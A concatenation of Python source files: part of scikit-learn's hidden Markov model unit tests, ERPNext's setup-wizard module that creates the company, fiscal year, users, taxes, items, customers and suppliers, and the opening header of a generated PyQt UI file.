self.assertRaises(ValueError, h.__setattr__, 'startprob_',
np.zeros((n_components - 2, 2)))
h.transmat_ = transmat
assert_array_almost_equal(h.transmat_, transmat)
self.assertRaises(ValueError, h.__setattr__, 'transmat_',
2 * transmat)
self.assertRaises(ValueError, h.__setattr__, 'transmat_', [])
self.assertRaises(ValueError, h.__setattr__, 'transmat_',
np.zeros((n_components - 2, n_components)))
def train_hmm_and_keep_track_of_log_likelihood(hmm, obs, n_iter=1, **kwargs):
hmm.n_iter = 1
hmm.fit(obs)
loglikelihoods = []
for n in xrange(n_iter):
hmm.n_iter = 1
hmm.init_params = ''
hmm.fit(obs)
loglikelihoods.append(sum(hmm.score(x) for x in obs))
return loglikelihoods
class GaussianHMMBaseTester(object):
def setUp(self):
self.prng = prng = np.random.RandomState(10)
self.n_components = n_components = 3
self.n_features = n_features = 3
self.startprob = prng.rand(n_components)
self.startprob = self.startprob / self.startprob.sum()
self.transmat = prng.rand(n_components, n_components)
self.transmat /= np.tile(self.transmat.sum(axis=1)[:, np.newaxis],
(1, n_components))
self.means = prng.randint(-20, 20, (n_components, n_features))
self.covars = {
'spherical': (1.0 + 2 * np.dot(prng.rand(n_components, 1),
np.ones((1, n_features)))) ** 2,
'tied': (make_spd_matrix(n_features, random_state=0)
+ np.eye(n_features)),
'diag': (1.0 + 2 * prng.rand(n_components, n_features)) ** 2,
'full': np.array([make_spd_matrix(n_features, random_state=0)
+ np.eye(n_features)
for x in range(n_components)]),
}
self.expanded_covars = {
'spherical': [np.eye(n_features) * cov
for cov in self.covars['spherical']],
'diag': [np.diag(cov) for cov in self.covars['diag']],
'tied': [self.covars['tied']] * n_components,
'full': self.covars['full'],
}
def test_bad_covariance_type(self):
hmm.GaussianHMM(20, self.covariance_type)
self.assertRaises(ValueError, hmm.GaussianHMM, 20,
'badcovariance_type')
def _test_attributes(self):
# XXX: This test is bugged and creates weird errors -- skipped
h = hmm.GaussianHMM(self.n_components, self.covariance_type)
self.assertEquals(h.n_components, self.n_components)
self.assertEquals(h.covariance_type, self.covariance_type)
h.startprob_ = self.startprob
assert_array_almost_equal(h.startprob_, self.startprob)
self.assertRaises(ValueError, h.__setattr__, 'startprob_',
2 * self.startprob)
self.assertRaises(ValueError, h.__setattr__, 'startprob_', [])
self.assertRaises(ValueError, h.__setattr__, 'startprob_',
np.zeros((self.n_components - 2, self.n_features)))
h.transmat_ = self.transmat
assert_array_almost_equal(h.transmat_, self.transmat)
self.assertRaises(ValueError, h.__setattr__, 'transmat_',
2 * self.transmat)
self.assertRaises(ValueError, h.__setattr__, 'transmat_', [])
self.assertRaises(ValueError, h.__setattr__, 'transmat_',
np.zeros((self.n_components - 2, self.n_components)))
h.means_ = self.means
self.assertEquals(h.n_features, self.n_features)
self.assertRaises(ValueError, h.__setattr__, 'means_', [])
self.assertRaises(ValueError, h.__setattr__, 'means_',
np.zeros((self.n_components - 2, self.n_features)))
h.covars_ = self.covars[self.covariance_type]
assert_array_almost_equal(h.covars_,
self.expanded_covars[self.covariance_type])
#self.assertRaises(ValueError, h.__setattr__, 'covars', [])
#self.assertRaises(ValueError, h.__setattr__, 'covars',
# np.zeros((self.n_components - 2, self.n_features)))
def test_eval_and_decode(self):
h = hmm.GaussianHMM(self.n_components, self.covariance_type)
h.means_ = self.means
h.covars_ = self.covars[self.covariance_type]
# Make sure the means are far apart so posteriors.argmax()
# picks the actual component used to generate the observations.
h.means_ = 20 * h.means_
gaussidx = np.repeat(range(self.n_components), 5)
nobs = len(gaussidx)
obs = self.prng.randn(nobs, self.n_features) + h.means_[gaussidx]
ll, posteriors = h.eval(obs)
self.assertEqual(posteriors.shape, (nobs, self.n_components))
assert_array_almost_equal(posteriors.sum(axis=1), np.ones(nobs))
viterbi_ll, stateseq = h.decode(obs)
assert_array_equal(stateseq, gaussidx)
def test_sample(self, n=1000):
h = hmm.GaussianHMM(self.n_components, self.covariance_type)
# Make sure the means are far apart so posteriors.argmax()
# picks the actual component used to generate the observations.
h.means_ = 20 * self.means
h.covars_ = np.maximum(self.covars[self.covariance_type], 0.1)
h.startprob_ = self.startprob
samples = h.sample(n)[0]
self.assertEquals(samples.shape, (n, self.n_features))
def test_fit(self, params='stmc', n_iter=5, verbose=False, **kwargs):
h = hmm.GaussianHMM(self.n_components, self.covariance_type)
h.startprob_ = self.startprob
h.transmat_ = hmm.normalize(self.transmat
+ np.diag(self.prng.rand(self.n_components)), 1)
h.means_ = 20 * self.means
h.covars_ = self.covars[self.covariance_type]
# Create training data by sampling from the HMM.
train_obs = [h.sample(n=10)[0] for x in xrange(10)]
# Mess up the parameters and see if we can re-learn them.
h.n_iter = 0
h.fit(train_obs)
trainll = train_hmm_and_keep_track_of_log_likelihood(
h, train_obs, n_iter=n_iter, params=params, **kwargs)[1:]
# Check that the loglik is always increasing during training
if not np.all(np.diff(trainll) > 0) and verbose:
print
print ('Test train: %s (%s)\n %s\n %s'
% (self.covariance_type, params, trainll, np.diff(trainll)))
delta_min = np.diff(trainll).min()
self.assertTrue(
delta_min > -0.8,
"The min nll increase is %f which is lower than the admissible"
" threshold of %f, for model %s. The likelihoods are %s."
% (delta_min, -0.8, self.covariance_type, trainll))
def test_fit_works_on_sequences_of_different_length(self):
obs = [self.prng.rand(3, self.n_features),
self.prng.rand(4, self.n_features),
self.prng.rand(5, self.n_features)]
h = hmm.GaussianHMM(self.n_components, self.covariance_type)
# This shouldn't raise
# ValueError: setting an array element with a sequence.
h.fit(obs)
def test_fit_with_priors(self, params='stmc', n_iter=5, verbose=False):
startprob_prior = 10 * self.startprob + 2.0
transmat_prior = 10 * self.transmat + 2.0
means_prior = self.means
means_weight = 2.0
covars_weight = 2.0
if self.covariance_type in ('full', 'tied'):
covars_weight += self.n_features
covars_prior = self.covars[self.covariance_type]
h = hmm.GaussianHMM(self.n_components, self.covariance_type)
h.startprob_ = self.startprob
h.startprob_prior = startprob_prior
h.transmat_ = hmm.normalize(self.transmat
+ np.diag(self.prng.rand(self.n_components)), 1)
h.transmat_prior = transmat_prior
h.means_ = 20 * self.means
h.means_prior = means_prior
h.means_weight = means_weight
h.covars_ = self.covars[self.covariance_type]
h.covars_prior = covars_prior
h.covars_weight = covars_weight
# Create training data by sampling from the HMM.
train_obs = [h.sample(n=10)[0] for x in xrange(10)]
# Mess up the parameters and see if we can re-learn them.
h.n_iter = 0
h.fit(train_obs[:1])
trainll = train_hmm_and_keep_track_of_log_likelihood(
h, train_obs, n_iter=n_iter, params=params)[1:]
# Check that the loglik is always increasing during training
if not np.all(np.diff(trainll) > 0) and verbose:
print
print ('Test MAP train: %s (%s)\n %s\n %s'
% (self.covariance_type, params, trainll, np.diff(trainll)))
# XXX: Why such a large tolerance?
self.assertTrue(np.all(np.diff(trainll) > -0.5))
class TestGaussianHMMWithSphericalCovars(GaussianHMMBaseTester, TestCase):
covariance_type = 'spherical'
def test_fit_startprob_and_transmat(self):
self.test_fit('st')
class TestGaussianHMMWithDiagonalCovars(GaussianHMMBaseTester, TestCase):
covariance_type = 'diag'
class TestGaussianHMMWithTiedCovars(GaussianHMMBaseTester, TestCase):
covariance_type = 'tied'
class TestGaussianHMMWithFullCovars(GaussianHMMBaseTester, TestCase):
covariance_type = 'full'
class MultinomialHMMTestCase(TestCase):
"""Using examples from Wikipedia
- http://en.wikipedia.org/wiki/Hidden_Markov_model
- http://en.wikipedia.org/wiki/Viterbi_algorithm
"""
def setUp(self):
self.prng = np.random.RandomState(9)
self.n_components = 2 # ('Rainy', 'Sunny')
self.n_symbols = 3 # ('walk', 'shop', 'clean')
self.emissionprob = [[0.1, 0.4, 0.5], [0.6, 0.3, 0.1]]
self.startprob = [0.6, 0.4]
self.transmat = [[0.7, 0.3], [0.4, 0.6]]
self.h = hmm.MultinomialHMM(self.n_components,
startprob=self.startprob,
transmat=self.transmat)
self.h.emissionprob_ = self.emissionprob
def test_wikipedia_viterbi_example(self):
# From http://en.wikipedia.org/wiki/Viterbi_algorithm:
# "This reveals that the observations ['walk', 'shop', 'clean']
# were most likely generated by states ['Sunny', 'Rainy',
# 'Rainy'], with probability 0.01344."
observations = [0, 1, 2]
logprob, state_sequence = self.h.decode(observations)
self.assertAlmostEqual(np.exp(logprob), 0.01344)
assert_array_equal(state_sequence, [1, 0, 0])
def test_attributes(self):
h = hmm.MultinomialHMM(self.n_components)
self.assertEquals(h.n_components, self.n_components)
h.startprob_ = self.startprob
assert_array_almost_equal(h.startprob_, self.startprob)
self.assertRaises(ValueError, h.__setattr__, 'startprob_',
2 * self.startprob)
self.assertRaises(ValueError, h.__setattr__, 'startprob_', [])
self.assertRaises(ValueError, h.__setattr__, 'startprob_',
np.zeros((self.n_components - 2, self.n_symbols)))
h.transmat_ = self.transmat
assert_array_almost_equal(h.transmat_, self.transmat)
self.assertRaises(ValueError, h.__setattr__, 'transmat_',
2 * self.transmat)
self.assertRaises(ValueError, h.__setattr__, 'transmat_', [])
self.assertRaises(ValueError, h.__setattr__, 'transmat_',
np.zeros((self.n_components - 2, self.n_components)))
h.emissionprob_ = self.emissionprob
assert_array_almost_equal(h.emissionprob_, self.emissionprob)
self.assertRaises(ValueError, h.__setattr__, 'emissionprob_', [])
self.assertRaises(ValueError, h.__setattr__, 'emissionprob_',
np.zeros((self.n_components - 2, self.n_symbols)))
self.assertEquals(h.n_symbols, self.n_symbols)
def test_eval(self):
idx = np.repeat(range(self.n_components), 10)
nobs = len(idx)
obs = [int(x) for x in np.floor(self.prng.rand(nobs) * self.n_symbols)]
ll, posteriors = self.h.eval(obs)
self.assertEqual(posteriors.shape, (nobs, self.n_components))
assert_array_almost_equal(posteriors.sum(axis=1), np.ones(nobs))
def test_sample(self, n=1000):
samples = self.h.sample(n)[0]
self.assertEquals(len(samples), n)
self.assertEquals(len(np.unique(samples)), self.n_symbols)
def test_fit(self, params='ste', n_iter=5, verbose=False, **kwargs):
h = self.h
# Create training data by sampling from the HMM.
train_obs = [h.sample(n=10)[0] for x in xrange(10)]
# Mess up the parameters and see if we can re-learn them.
h.startprob_ = hmm.normalize(self.prng.rand(self.n_components))
h.transmat_ = hmm.normalize(self.prng.rand(self.n_components,
self.n_components), axis=1)
h.emissionprob_ = hmm.normalize(
self.prng.rand(self.n_components, self.n_symbols), axis=1)
trainll = train_hmm_and_keep_track_of_log_likelihood(
h, train_obs, n_iter=n_iter, params=params, **kwargs)[1:]
# Check that the loglik is always increasing during training
if not np.all(np.diff(trainll) > 0) and verbose:
print
print 'Test train: (%s)\n %s\n %s' % (params, trainll,
np.diff(trainll))
self.assertTrue(np.all(np.diff(trainll) > - 1.e-3))
def test_fit_emissionprob(self):
self.test_fit('e')
def create_random_gmm(n_mix, n_features, covariance_type, prng=0):
prng = check_random_state(prng)
g = mixture.GMM(n_mix, covariance_type=covariance_type)
g.means_ = prng.randint(-20, 20, (n_mix, n_features))
mincv = 0.1
g.covars_ = {
'spherical': (mincv + mincv * np.dot(prng.rand(n_mix, 1),
np.ones((1, n_features)))) ** 2,
'tied': (make_spd_matrix(n_features, random_state=prng)
+ mincv * np.eye(n_features)),
'diag': (mincv + mincv * prng.rand(n_mix, n_features)) ** 2,
'full': np.array(
[make_spd_matrix(n_features, random_state=prng)
+ mincv * np.eye(n_features) for x in xrange(n_mix)])
}[covariance_type]
g.weights_ = hmm.normalize(prng.rand(n_mix))
return g
class GMMHMMBaseTester(object):
def setUp(self):
self.prng = np.random.RandomState(9)
self.n_components = 3
self.n_mix = 2
self.n_features = 2
self.covariance_type = 'diag'
self.startprob = self.prng.rand(self.n_components)
self.startprob = self.startprob / self.startprob.sum()
self.transmat = self.prng.rand(self.n_components, self.n_components)
self.transmat /= np.tile(self.transmat.sum(axis=1)[:, np.newaxis],
(1, self.n_components))
self.gmms = []
for state in xrange(self.n_components):
self.gmms.append(create_random_gmm(
self.n_mix, self.n_features, self.covariance_type,
prng=self.prng))
def test_attributes(self):
h = hmm.GMMHMM(self.n_components, covariance_type=self.covariance_type)
self.assertEquals(h.n_components, self.n_components)
h.startprob_ = self.startprob
assert_array_almost_equal(h.startprob_, self.startprob)
self.assertRaises(ValueError, h.__setattr__, 'startprob_',
2 * self.startprob)
self.assertRaises(ValueError, h.__setattr__, 'startprob_', [])
self.assertRaises(ValueError, h.__setattr__, 'startprob_',
np.zeros((self.n_components - 2, self.n_features)))
h.transmat_ = self.transmat
assert_array_almost_equal(h.transmat_, self.transmat)
self.assertRaises(ValueError, h.__setattr__, 'transmat_',
2 * self.transmat)
self.assertRaises(ValueError, h.__setattr__, 'transmat_', [])
self.assertRaises(ValueError, h.__setattr__, 'transmat_',
np.zeros((self.n_components - 2, self.n_components)))
def test_eval_and_decode(self):
h = hmm.GMMHMM(self.n_components, gmms=self.gmms)
# Make sure the means are far apart so posteriors.argmax()
# picks the actual component used to generate the observations.
for g in h.gmms:
g.means_ *= 20
refstateseq = np.repeat(range(self.n_components), 5)
nobs = len(refstateseq)
obs = [h.gmms[x].sample(1).flatten() for x in refstateseq]
ll, posteriors = h.eval(obs)
self.assertEqual(posteriors.shape, (nobs, self.n_components))
assert_array_almost_equal(posteriors.sum(axis=1), np.ones(nobs))
viterbi_ll, stateseq = h.decode(obs)
assert_array_equal(stateseq, refstateseq)
def test_sample(self, n=1000):
h = hmm.GMMHMM(self.n_components, self.covariance_type,
startprob=self.startprob, transmat=self.transmat,
gmms=self.gmms)
samples = h.sample(n)[0]
self.assertEquals(samples.shape, (n, self.n_features))
def test_fit(self, params='stmwc', n_iter=5, verbose=False, **kwargs):
h = hmm.GMMHMM(self.n_components, covars_prior=1.0)
h.startprob_ = self.startprob
h.transmat_ = hmm.normalize(
self.transmat + np.diag(self.prng.rand(self.n_components)), 1)
h.gmms = self.gmms
# Create training data by sampling from the HMM.
train_obs = [h.sample(n=10,
random_state=self.prng)[0] for x in xrange(10)]
# Mess up the parameters and see if we can re-learn them.
h.n_iter = 0
h.fit(train_obs)
h.transmat_ = hmm.normalize(self.prng.rand(self.n_components,
self.n_components), axis=1)
h.startprob_ = hmm.normalize(self.prng.rand(self.n_components))
trainll = train_hmm_and_keep_track_of_log_likelihood(
h, train_obs, n_iter=n_iter, params=params)[1:]
if not np.all(np.diff(trainll) > 0) and verbose:
print
print 'Test train: (%s)\n %s\n %s' % (params, trainll,
np.diff(trainll))
# XXX: this test appears to check that training log likelihood should
# never be decreasing (up to a tolerance of 0.5, why?) but this is not
# the case when the seed changes.
raise SkipTest("Unstable test: trainll is not always increasing "
"depending on seed")
self.assertTrue(np.all(np.diff(trainll) > -0.5))
def test_fit_works_on_sequences_of_different_length(self):
obs = [self.prng.rand(3, self.n_features),
self.prng.rand(4, self.n_features),
self.prng.rand(5, self.n_features)]
h = hmm.GMMHMM(self.n_components, covariance_type=self.covariance_type)
# This shouldn't raise
# ValueError: setting an array element with a sequence.
h.fit(obs)
class TestGMMHMMWithDiagCovars(GMMHMMBaseTester, TestCase):
covariance_type = 'diag'
def test_fit_startprob_and_transmat(self):
self.test_fit('st')
def test_fit_means(self):
self.test_fit('m')
class TestGMMHMMWithTiedCovars(GMMHMMBaseTester, TestCase):
covariance_type = 'tied'
class TestGMMHMMWithFullCovars(GMMHMMBaseTester, TestCase):
covariance_type = 'full'
def test_normalize_1D():
A = rng.rand(2) + 1.0
for axis in range(1):
Anorm = hmm.normalize(A, axis)
assert np.all(np.allclose(Anorm.sum(axis), 1.0))
def test_normalize_3D():
A = rng.rand(2, 2, 2) + 1.0
for axis in range(3):
Anorm = hmm.normalize(A, axis)
assert np.all(np.allclose(Anorm.sum(axis), 1.0))
| GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/sklearn/tests/test_hmm.py | Python | agpl-3.0 | 26,383 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, json, copy
from frappe.utils import cstr, flt, getdate
from frappe import _
from frappe.utils.file_manager import save_file
from frappe.translate import (set_default_language, get_dict,
get_lang_dict, send_translations, get_language_from_code)
from frappe.geo.country_info import get_country_info
from frappe.utils.nestedset import get_root_of
from .default_website import website_maker
import install_fixtures
from .sample_data import make_sample_data
from erpnext.accounts.utils import FiscalYearError
@frappe.whitelist()
def setup_account(args=None):
try:
if frappe.db.sql("select name from tabCompany"):
frappe.throw(_("Setup Already Complete!!"))
if not args:
args = frappe.local.form_dict
if isinstance(args, basestring):
args = json.loads(args)
args = frappe._dict(args)
if args.language and args.language != "english":
set_default_language(args.language)
frappe.clear_cache()
install_fixtures.install(args.get("country"))
update_user_name(args)
frappe.local.message_log = []
create_fiscal_year_and_company(args)
frappe.local.message_log = []
create_users(args)
frappe.local.message_log = []
set_defaults(args)
frappe.local.message_log = []
create_territories()
frappe.local.message_log = []
create_price_lists(args)
frappe.local.message_log = []
create_feed_and_todo()
frappe.local.message_log = []
create_email_digest()
frappe.local.message_log = []
create_letter_head(args)
frappe.local.message_log = []
create_taxes(args)
frappe.local.message_log = []
create_items(args)
frappe.local.message_log = []
create_customers(args)
frappe.local.message_log = []
create_suppliers(args)
frappe.local.message_log = []
frappe.db.set_default('desktop:home_page', 'desktop')
website_maker(args.company_name.strip(), args.company_tagline, args.name)
create_logo(args)
frappe.db.commit()
login_as_first_user(args)
frappe.db.commit()
frappe.clear_cache()
if args.get("add_sample_data"):
try:
make_sample_data()
except FiscalYearError:
pass
except:
if args:
traceback = frappe.get_traceback()
for hook in frappe.get_hooks("setup_wizard_exception"):
frappe.get_attr(hook)(traceback, args)
raise
else:
for hook in frappe.get_hooks("setup_wizard_success"):
frappe.get_attr(hook)(args)
def update_user_name(args):
if args.get("email"):
args['name'] = args.get("email")
frappe.flags.mute_emails = True
doc = frappe.get_doc({
"doctype":"User",
"email": args.get("email"),
"first_name": args.get("first_name"),
"last_name": args.get("last_name")
})
doc.flags.no_welcome_mail = True
doc.insert()
frappe.flags.mute_emails = False
from frappe.auth import _update_password
_update_password(args.get("email"), args.get("password"))
else:
args['name'] = frappe.session.user
# Update User
if not args.get('last_name') or args.get('last_name')=='None':
args['last_name'] = None
frappe.db.sql("""update `tabUser` SET first_name=%(first_name)s,
last_name=%(last_name)s WHERE name=%(name)s""", args)
if args.get("attach_user"):
attach_user = args.get("attach_user").split(",")
if len(attach_user)==3:
filename, filetype, content = attach_user
fileurl = save_file(filename, content, "User", args.get("name"), decode=True).file_url
frappe.db.set_value("User", args.get("name"), "user_image", fileurl)
add_all_roles_to(args.get("name"))
def create_fiscal_year_and_company(args):
curr_fiscal_year = get_fy_details(args.get('fy_start_date'), args.get('fy_end_date'))
frappe.get_doc({
"doctype":"Fiscal Year",
'year': curr_fiscal_year,
'year_start_date': args.get('fy_start_date'),
'year_end_date': args.get('fy_end_date'),
}).insert()
# Company
frappe.get_doc({
"doctype":"Company",
'domain': args.get("industry"),
'company_name':args.get('company_name').strip(),
'abbr':args.get('company_abbr'),
'default_currency':args.get('currency'),
'country': args.get('country'),
'chart_of_accounts': args.get(('chart_of_accounts')),
}).insert()
# Bank Account
args["curr_fiscal_year"] = curr_fiscal_year
def create_price_lists(args):
for pl_type, pl_name in (("Selling", _("Standard Selling")), ("Buying", _("Standard Buying"))):
frappe.get_doc({
"doctype": "Price List",
"price_list_name": pl_name,
"enabled": 1,
"buying": 1 if pl_type == "Buying" else 0,
"selling": 1 if pl_type == "Selling" else 0,
"currency": args["currency"],
"territories": [{
"territory": get_root_of("Territory")
}]
}).insert()
def set_defaults(args):
# enable default currency
frappe.db.set_value("Currency", args.get("currency"), "enabled", 1)
global_defaults = frappe.get_doc("Global Defaults", "Global Defaults")
global_defaults.update({
'current_fiscal_year': args.curr_fiscal_year,
'default_currency': args.get('currency'),
'default_company':args.get('company_name').strip(),
"country": args.get("country"),
})
global_defaults.save()
number_format = get_country_info(args.get("country")).get("number_format", "#,###.##")
# replace these as float number formats, as they have 0 precision
# and are currency number formats and not for floats
if number_format=="#.###":
number_format = "#.###,##"
elif number_format=="#,###":
number_format = "#,###.##"
system_settings = frappe.get_doc("System Settings", "System Settings")
system_settings.update({
"language": args.get("language"),
"time_zone": args.get("timezone"),
"float_precision": 3,
"email_footer_address": args.get("company"),
'date_format': frappe.db.get_value("Country", args.get("country"), "date_format"),
'number_format': number_format,
'enable_scheduler': 1 if not frappe.flags.in_test else 0
})
system_settings.save()
accounts_settings = frappe.get_doc("Accounts Settings")
accounts_settings.auto_accounting_for_stock = 1
accounts_settings.save()
stock_settings = frappe.get_doc("Stock Settings")
stock_settings.item_naming_by = "Item Code"
stock_settings.valuation_method = "FIFO"
stock_settings.stock_uom = _("Nos")
stock_settings.auto_indent = 1
stock_settings.auto_insert_price_list_rate_if_missing = 1
stock_settings.save()
selling_settings = frappe.get_doc("Selling Settings")
selling_settings.cust_master_name = "Customer Name"
selling_settings.so_required = "No"
selling_settings.dn_required = "No"
selling_settings.save()
buying_settings = frappe.get_doc("Buying Settings")
buying_settings.supp_master_name = "Supplier Name"
buying_settings.po_required = "No"
buying_settings.pr_required = "No"
buying_settings.maintain_same_rate = 1
buying_settings.save()
notification_control = frappe.get_doc("Notification Control")
notification_control.quotation = 1
notification_control.sales_invoice = 1
notification_control.purchase_order = 1
notification_control.save()
hr_settings = frappe.get_doc("HR Settings")
hr_settings.emp_created_by = "Naming Series"
hr_settings.save()
def create_feed_and_todo():
"""update Activity feed and create todo for creation of item, customer, vendor"""
frappe.get_doc({
"doctype": "Feed",
"feed_type": "Comment",
"subject": "ERPNext Setup Complete!"
}).insert(ignore_permissions=True)
def create_email_digest():
from frappe.utils.user import get_system_managers
system_managers = get_system_managers(only_name=True)
if not system_managers:
return
companies = frappe.db.sql_list("select name FROM `tabCompany`")
for company in companies:
if not frappe.db.exists("Email Digest", "Default Weekly Digest - " + company):
edigest = frappe.get_doc({
"doctype": "Email Digest",
"name": "Default Weekly Digest - " + company,
"company": company,
"frequency": "Weekly",
"recipient_list": "\n".join(system_managers)
})
for df in edigest.meta.get("fields", {"fieldtype": "Check"}):
if df.fieldname != "scheduler_errors":
edigest.set(df.fieldname, 1)
edigest.insert()
# scheduler errors digest
if companies:
edigest = frappe.new_doc("Email Digest")
edigest.update({
"name": "Scheduler Errors",
"company": companies[0],
"frequency": "Daily",
"recipient_list": "\n".join(system_managers),
"scheduler_errors": 1,
"enabled": 1
})
edigest.insert()
def get_fy_details(fy_start_date, fy_end_date):
start_year = getdate(fy_start_date).year
if start_year == getdate(fy_end_date).year:
fy = cstr(start_year)
else:
fy = cstr(start_year) + '-' + cstr(start_year + 1)
return fy
def create_taxes(args):
for i in xrange(1,6):
if args.get("tax_" + str(i)):
# replace % in case someone also enters the % symbol
tax_rate = (args.get("tax_rate_" + str(i)) or "").replace("%", "")
try:
tax_group = frappe.db.get_value("Account", {"company": args.get("company_name"),
"is_group": 1, "account_type": "Tax", "root_type": "Liability"})
if tax_group:
account = make_tax_head(args, i, tax_group, tax_rate)
make_sales_and_purchase_tax_templates(account)
except frappe.NameError, e:
if e.args[2][0]==1062:
pass
else:
raise
def make_tax_head(args, i, tax_group, tax_rate):
return frappe.get_doc({
"doctype":"Account",
"company": args.get("company_name").strip(),
"parent_account": tax_group,
"account_name": args.get("tax_" + str(i)),
"is_group": 0,
"report_type": "Balance Sheet",
"account_type": "Tax",
"tax_rate": flt(tax_rate) if tax_rate else None
}).insert(ignore_permissions=True)
def make_sales_and_purchase_tax_templates(account):
doc = {
"doctype": "Sales Taxes and Charges Template",
"title": account.name,
"taxes": [{
"category": "Valuation and Total",
"charge_type": "On Net Total",
"account_head": account.name,
"description": "{0} @ {1}".format(account.account_name, account.tax_rate),
"rate": account.tax_rate
}]
}
# Sales
frappe.get_doc(copy.deepcopy(doc)).insert()
# Purchase
doc["doctype"] = "Purchase Taxes and Charges Template"
frappe.get_doc(copy.deepcopy(doc)).insert()
def create_items(args):
for i in xrange(1,6):
item = args.get("item_" + str(i))
if item:
item_group = args.get("item_group_" + str(i))
is_sales_item = args.get("is_sales_item_" + str(i))
is_purchase_item = args.get("is_purchase_item_" + str(i))
is_stock_item = item_group!=_("Services")
default_warehouse = ""
if is_stock_item:
default_warehouse = frappe.db.get_value("Warehouse", filters={
"warehouse_name": _("Finished Goods") if is_sales_item else _("Stores"),
"company": args.get("company_name").strip()
})
try:
frappe.get_doc({
"doctype":"Item",
"item_code": item,
"item_name": item,
"description": item,
"is_sales_item": 1 if is_sales_item else 0,
"is_purchase_item": 1 if is_purchase_item else 0,
"show_in_website": 1,
"is_stock_item": is_stock_item and 1 or 0,
"item_group": item_group,
"stock_uom": args.get("item_uom_" + str(i)),
"default_warehouse": default_warehouse
}).insert()
if args.get("item_img_" + str(i)):
item_image = args.get("item_img_" + str(i)).split(",")
if len(item_image)==3:
filename, filetype, content = item_image
fileurl = save_file(filename, content, "Item", item, decode=True).file_url
frappe.db.set_value("Item", item, "image", fileurl)
if args.get("item_price_" + str(i)):
item_price = flt(args.get("item_price_" + str(i)))
if is_sales_item:
price_list_name = frappe.db.get_value("Price List", {"selling": 1})
make_item_price(item, price_list_name, item_price)
if is_purchase_item:
price_list_name = frappe.db.get_value("Price List", {"buying": 1})
make_item_price(item, price_list_name, item_price)
except frappe.NameError:
pass
def make_item_price(item, price_list_name, item_price):
frappe.get_doc({
"doctype": "Item Price",
"price_list": price_list_name,
"item_code": item,
"price_list_rate": item_price
}).insert()
def create_customers(args):
for i in xrange(1,6):
customer = args.get("customer_" + str(i))
if customer:
try:
frappe.get_doc({
"doctype":"Customer",
"customer_name": customer,
"customer_type": "Company",
"customer_group": _("Commercial"),
"territory": args.get("country"),
"company": args.get("company_name").strip()
}).insert()
if args.get("customer_contact_" + str(i)):
create_contact(args.get("customer_contact_" + str(i)),
"customer", customer)
except frappe.NameError:
pass
def create_suppliers(args):
for i in xrange(1,6):
supplier = args.get("supplier_" + str(i))
if supplier:
try:
frappe.get_doc({
"doctype":"Supplier",
"supplier_name": supplier,
"supplier_type": _("Local"),
"company": args.get("company_name").strip()
}).insert()
if args.get("supplier_contact_" + str(i)):
create_contact(args.get("supplier_contact_" + str(i)),
"supplier", supplier)
except frappe.NameError:
pass
def create_contact(contact, party_type, party):
"""Create contact based on given contact name"""
contact = contact.strip().split(" ")
frappe.get_doc({
"doctype":"Contact",
party_type: party,
"first_name":contact[0],
"last_name": len(contact) > 1 and contact[1] or ""
}).insert()
def create_letter_head(args):
if args.get("attach_letterhead"):
frappe.get_doc({
"doctype":"Letter Head",
"letter_head_name": _("Standard"),
"is_default": 1
}).insert()
attach_letterhead = args.get("attach_letterhead").split(",")
if len(attach_letterhead)==3:
filename, filetype, content = attach_letterhead
fileurl = save_file(filename, content, "Letter Head", _("Standard"), decode=True).file_url
frappe.db.set_value("Letter Head", _("Standard"), "content", "<img src='%s' style='max-width: 100%%;'>" % fileurl)
def create_logo(args):
if args.get("attach_logo"):
attach_logo = args.get("attach_logo").split(",")
if len(attach_logo)==3:
filename, filetype, content = attach_logo
fileurl = save_file(filename, content, "Website Settings", "Website Settings",
decode=True).file_url
frappe.db.set_value("Website Settings", "Website Settings", "brand_html",
"<img src='{0}' style='max-width: 40px; max-height: 25px;'> {1}".format(fileurl, args.get("company_name").strip()))
def add_all_roles_to(name):
user = frappe.get_doc("User", name)
for role in frappe.db.sql("""select name from tabRole"""):
if role[0] not in ["Administrator", "Guest", "All", "Customer", "Supplier", "Partner", "Employee"]:
d = user.append("user_roles")
d.role = role[0]
user.save()
def create_territories():
"""create two default territories, one for home country and one named Rest of the World"""
from frappe.utils.nestedset import get_root_of
country = frappe.db.get_default("country")
root_territory = get_root_of("Territory")
for name in (country, _("Rest Of The World")):
if name and not frappe.db.exists("Territory", name):
frappe.get_doc({
"doctype": "Territory",
"territory_name": name.replace("'", ""),
"parent_territory": root_territory,
"is_group": "No"
}).insert()
def login_as_first_user(args):
if args.get("email") and hasattr(frappe.local, "login_manager"):
frappe.local.login_manager.login_as(args.get("email"))
def create_users(args):
# create employee for self
emp = frappe.get_doc({
"doctype": "Employee",
"full_name": " ".join(filter(None, [args.get("first_name"), args.get("last_name")])),
"user_id": frappe.session.user,
"status": "Active",
"company": args.get("company_name")
})
emp.flags.ignore_mandatory = True
emp.insert(ignore_permissions = True)
for i in xrange(1,5):
email = args.get("user_email_" + str(i))
fullname = args.get("user_fullname_" + str(i))
if email:
if not fullname:
fullname = email.split("@")[0]
parts = fullname.split(" ", 1)
user = frappe.get_doc({
"doctype": "User",
"email": email,
"first_name": parts[0],
"last_name": parts[1] if len(parts) > 1 else "",
"enabled": 1,
"user_type": "System User"
})
# default roles
user.append_roles("Projects User", "Stock User", "Support Team")
if args.get("user_sales_" + str(i)):
user.append_roles("Sales User", "Sales Manager", "Accounts User")
if args.get("user_purchaser_" + str(i)):
user.append_roles("Purchase User", "Purchase Manager", "Accounts User")
if args.get("user_accountant_" + str(i)):
user.append_roles("Accounts Manager", "Accounts User")
user.flags.delay_emails = True
if not frappe.db.get_value("User", email):
user.insert(ignore_permissions=True)
# create employee
emp = frappe.get_doc({
"doctype": "Employee",
"full_name": fullname,
"user_id": email,
"status": "Active",
"company": args.get("company_name")
})
emp.flags.ignore_mandatory = True
emp.insert(ignore_permissions = True)
@frappe.whitelist()
def load_messages(language):
frappe.clear_cache()
set_default_language(language)
m = get_dict("page", "setup-wizard")
m.update(get_dict("boot"))
send_translations(m)
return frappe.local.lang
@frappe.whitelist()
def load_languages():
return {
"default_language": get_language_from_code(frappe.local.lang),
"languages": sorted(get_lang_dict().keys())
}
| indictranstech/reciphergroup-erpnext | erpnext/setup/page/setup_wizard/setup_wizard.py | Python | agpl-3.0 | 17,443 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/ckla/Documents/workspace/opus_trunk/opus_gui/main/views/list_editor.ui'
#
